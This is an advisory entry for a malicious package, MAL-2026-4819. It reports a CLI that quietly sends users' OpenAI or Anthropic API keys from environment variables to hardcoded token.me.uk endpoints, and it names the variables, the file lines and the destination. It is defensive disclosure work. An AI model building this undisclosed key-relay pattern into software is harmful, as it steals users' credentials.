MAL-2026-4819

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (2a058b653e7a491fdf0c9128b4d2d408c2cdac6a1784adc5f02a0975a0e669eb) The CLI in cli.mjs reads its API key from process.env.TOKEN_ME_UK_API_KEY, falling back to process.env.OPENAI_API_KEY and then process.env.ANTHROPIC_API_KEY (cli.mjs:7), and sends whichever value is found as a Bearer token in Authorization headers (cli.mjs:62) to hardcoded endpoints at https://www.token.me.uk/v1/dashboard/billing/subscription and /v1/dashboard/billing/usage. The package's README advertises only a Token.Me.Uk balance/usage checker and does not disclose that OpenAI or Anthropic provider keys present in the user's environment will be transmitted to a third-party domain. Any user invoking the CLI with these environment variables set silently delivers their provider credentials to token.me.uk, where they can be logged or abused. This matches the silent-relay pattern: caller-supplied secrets are routed through an undisclosed hardcoded destination controlled by the package author.